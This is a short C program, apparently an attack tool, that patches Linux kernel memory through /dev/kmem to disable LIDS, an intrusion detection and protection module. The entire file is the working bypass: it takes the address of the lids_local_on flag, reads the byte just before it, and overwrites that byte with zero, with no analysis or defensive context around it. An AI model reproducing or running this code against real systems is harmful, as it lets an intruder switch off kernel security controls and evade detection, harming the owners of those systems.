/* Simple and stupid kmem patcher for LIDS.
 * Licensed under the GPL. :-)
 */
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <stdlib.h>

void die(const char *s)
{
	perror(s);
	exit(errno);
}


int main(int argc, char **argv)
{
	
	char zero;
	off_t off;
	int kmem;

	if (argc < 2) {
		printf("Usage: %s <addr-of-lids_local_on-in-hex>\n\n", *argv);
		return 1;
	}

	kmem =  open("/dev/kmem", O_RDWR);
	if (kmem < 0)
		die("open");

	off = strtoul(argv[1], 0, 16);
	printf("# Patching [%x]\n", off-4);

	lseek(kmem, off-4, SEEK_SET);
	read(kmem, &zero, sizeof(zero));
	printf("%d -> 0\n", zero);

	lseek(kmem, off-4, SEEK_SET);
	zero = 0;
	write(kmem, &zero, sizeof(zero));
	close(kmem);
	return 0;
}

